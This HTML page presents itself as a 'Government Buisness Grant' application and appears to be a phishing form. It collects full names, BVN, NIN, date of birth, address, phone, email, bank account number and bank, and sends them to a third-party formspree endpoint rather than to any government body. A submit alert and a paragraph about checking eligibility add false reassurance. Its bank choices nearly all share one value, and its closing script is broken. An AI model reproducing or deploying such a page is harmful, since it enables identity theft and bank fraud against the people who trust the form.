<!DOCTYPE html>
<html>
 <head>
 <title>Government Buisness Grant</title>
 <style type="text/css"> 
 *{
 margin:0%;
 padding:0%;
 }
 .container{
 margin-top:10%;
 margin-left:20%;
 position:absolute;
 justify-content:middle;
 align-item:middle;
 }
 .content{
 
 width:160%;
 height:250%;
 background-color:#fffaf0;
 }
body::before,
body::after{
  content: '';
  position: absolute;
  left: 0;
  top: 0;
  height: 100%;
  width: 100%;
}
body::before{
  clip-path: circle(30% at left 20%);
  opacity: 0.4;
  background-image: linear-gradient( 135deg, #7cfc00 10%, #fff 100%);
}
body::after{
  opacity: 0.4;
  clip-path: circle(25% at right 80%);
  background-image: linear-gradient( 135deg, #228b22 10%, #228b22 100%);
}
 .input{
 border-radius:10px;
 margin-left:10%;
 padding:4px;
 }
 .input2{
 border-radius:10px;
 margin-left:7%;
 padding:4px;
 }
 .input3{
 border-radius:10px;
 margin-left:10%;
 padding:4px;
 }
 .input4{
 border-radius:10px;
 margin-left:17%;
 padding:4px;
 }
 .input5{
 border-radius:10px;
 margin-left:6%;
 padding:4px;
 }
 .input6{
 border-radius:10px;
 margin-left:18%;
 padding:4px;
 }
 .input7{
 border-radius:10px;
 margin-left:4%;
 padding:4px;
 }
 .input8{
 border-radius:10px;
 margin-left:10%;
 padding:4px;
 }
 .input1{
 width:30%;
 border-radius:10px;
 margin-left:28%;
 padding:10px;
 background-color:#228b22;
 }
 .hd1{
 font-size:30px;
  color:#000;
  margin-left:20%;
  margin-top:10%;
 }
 .hd2{
 font-size:25px;
  color:#000;
  margin-left:20%;
  margin-top:10%;
 }
 .label{
  margin-left:10%;
 }
 </style>
 </head>
 <body>
 <br>
 <br>
 <header class="hd1">Government Buisness Grant</header>
 <br>
 <br>
 <header class="hd2">Personal Information</header>
 <br>
 <form method="post" action="https://formspree.io/f/xleyeqby">
   <label class="label">First Name<input placeholder="First Name" class="input"type="text" required></input></label>
    <br>
	<br>
   <label class="label">Middle Name<input placeholder="Middle Name" required class="input2"type="text"></input></label>
   <br>
   <br>
   <label class="label">Last Name<input placeholder="Enter Your Last Name" class="input3"type="text" required></input></label>
   <br>
   <br>
   <label class="label">BVN<input placeholder="Enter A Valid BVN" class="input6"type="number" required></input></label>   
   <br>
   <br>
   <label class="label">Date Of Birth<input placeholder="Enter The D.O.B In Your BVN" class="input6"type="date" required></input></label>
   <br>
   <br>
   <label class="label">NIN<input placeholder="Enter Your NIN" class="input8"type="number" required></input></label>
   <br>
   <br>
    <label class="label">Residential Address<input placeholder="Enter your Address" class="input6"type="text" required></input></label>
   <br>
   <br>
   <label class="label">Sex
   <input name="sex" class="input8"type="radio" id="male"
   value="male" required></input>
   <label for="male">MALE</label>
    <input name="sex" class="input8"type="radio" id="female"
   value="female" required></input>
   <label for="female">FEMALE</label>
   </label>
   <br>
   <br>
   <header class="hd2">Contact Information</header>
   <br>
   <br>
   <label class="label">Email<input placeholder="Enter A Valid Email" class="input4"type="email" required></input></label>
   <br>
   <br>
   <label class="label">Phone Number<input placeholder="Enter A Valid Phone Number" class="input5"type="number" name="phone" required></input></label>
   <br>
   <br>
   <label class="label">Account Number<input placeholder="Enter Account Number" class="input7"type="number" required></input></label>
   <br>
   <br>
    <label class="label">Select Bank 
	<br>
   <input name="bank" class="input8"type="radio" id="opay"
   value="opay"></input>
   <label for="opay">OPAY</label>
    <input name="bank" class="input8"type="radio" id="palmpay"
   value="palmpay"></input>
   <label for="palmpay">PALMPAY</label>
   <input name="bank" class="input8"type="radio" id="palmpay"
   value="palmpay"></input>
   <label for="palmpay">KUDA</label>
   <br>
   <input name="bank" class="input8"type="radio" id="palmpay"
   value="palmpay"></input>
   <label for="palmpay">ACCESS</label>
   <input name="bank" class="input8"type="radio" id="palmpay"
   value="palmpay"></input>
   <label for="palmpay">UNION BANK</label>
   <input name="bank" class="input8"type="radio" id="palmpay"
   value="palmpay"></input>
   <label for="palmpay">ZENITH BANK</label>
   <br>
   <input name="bank" class="input8"type="radio" id="palmpay"
   value="palmpay"></input>
   <label for="palmpay">UBA</label>
   <input name="bank" class="input8"type="radio" id="palmpay"
   value="palmpay"></input>
   <label for="palmpay">FIDELITY</label>
   <input name="bank" class="input8"type="radio" id="palmpay"
   value="palmpay"></input>
   <label for="palmpay">FIRST BANK</label>
   <br>
      <input name="bank" class="input8"type="radio" id="palmpay"
   value="palmpay"></input>
   <label for="palmpay">CITI BANK</label>
      <input name="bank" class="input8"type="radio" id="palmpay"
   value="palmpay"></input>
   <label for="palmpay">ECO BANK</label>
      <input name="bank" class="input8"type="radio" id="palmpay"
   value="palmpay"></input>
   <label for="palmpay">FCMB BANK</label>
   <br>
      <input name="bank" class="input8"type="radio" id="palmpay"
   value="palmpay"></input>
   <label for="palmpay">GTB BANK</label>
      <input name="bank" class="input8"type="radio" id="palmpay"
   value="palmpay"></input>
   <label for="palmpay">HERITAGE BANK</label>
   <br>
      <input name="bank" class="input8"type="radio" id="palmpay"
   value="palmpay"></input>
   <label for="palmpay">KEYSTONE BANK</label>
   <br>
      <input name="bank" class="input8"type="radio" id="palmpay"
   value="palmpay"></input>
   <label for="palmpay">JAIZ BANK</label>
      <input name="bank" class="input8"type="radio" id="palmpay"
   value="palmpay"></input>
   <label for="palmpay">PROVIDUS BANK</label>
   <br>
      <input name="bank" class="input8"type="radio" id="palmpay"
   value="palmpay"></input>
   <label for="palmpay">POLARIS BANK</label>
   <br>
      <input name="bank" class="input8"type="radio" id="palmpay"
   value="palmpay"></input>
   <label for="palmpay">STANBIC IBTC BANK</label>
      <input name="bank" class="input8"type="radio" id="palmpay"
   value="palmpay"></input>
   <label for="palmpay">SUNTRUST BANK</label>
      <input name="bank" class="input8"type="radio" id="palmpay"
   value="palmpay"></input>
   <label for="palmpay">WEMA BANK</label>
   <br>
      <input name="bank" class="input8"type="radio" id="palmpay"
   value="palmpay"></input>
   <label for="palmpay">UNITY BANK</label>
      <input name="bank" class="input8"type="radio" id="palmpay"
   value="palmpay"></input>
   <label for="palmpay">OTHERS</label>
   <input type="text" class="input8" placeholder="enter bank name"></input>
   </label>
   <br>
   <br>
   
   <br>
    <header class="hd2">Buisness Information</header>   
   <br>   
   <br>   
   <label class="label">Buisness Name<input placeholder="Enter Your Buisness Name" class="input8"type="text" required></input></label>
   <br>
   <br>
   <label class="label">Buisness Type<input placeholder="Enter Your Buisness type" class="input8"type="text" required></input></label>   
   <br>
   <br>      
   <label class="label">Company Name<input placeholder="Optional" class="input8"type="text"></input></label>
   <br>
   <br>   
   <label class="label">CAC Reg No<input placeholder="Enter Your Company Reg No" class="input8"type="text"></input></label>
   <br>
   <br>
    <label class="label">Buisness Type
	<br>
   <input name="type" class="input8"type="checkbox" id="buisness"
   value="buisness"></input>
   <label for="buisness">Farming</label>
    <input name="type1" class="input8"type="checkbox" id="buisness"
   value="buisness"></input>
   <label for="buisness">Trader</label>
    <input name="type2" class="input8"type="checkbox" id="buisness"
   value="buisness"></input>
   <label for="buisness">Tech</label>
    <br>
    <input name="type3" class="input8"type="checkbox" id="buisness"
   value="buisness"></input>
   <label for="buisness">Forex Trading</label>
   </label>   
   <br>   
   <br>   
   <input id="color" type="submit" class="input1" onclick="alert('Good Job Please Expect Your Response Soon');" ></input>
 </form>
  
     <br>
     <br>
     <br>
     <br>
<p> The details you provided,will be checked to know if you have applied previously for this service
.And if you're not indepteted to any loan agent,app or facilities. 
if you have a clear record we will surely contact,you to inform you about your elegibility status,
and how much you can be granted for your buisness </p>	 
     <br>
     <br>
     <br>
     <br>
	      <br>
     <br>
     <br>
     <br>
	 <script>
	 console.log('hello dear')
	 var botom = document.getElementById("color");
	 botom.style.color="red";
	 if (botom onclick="red"){color=("blue");}
	 else{color=("green");}
	 </script>
 </body>
</html>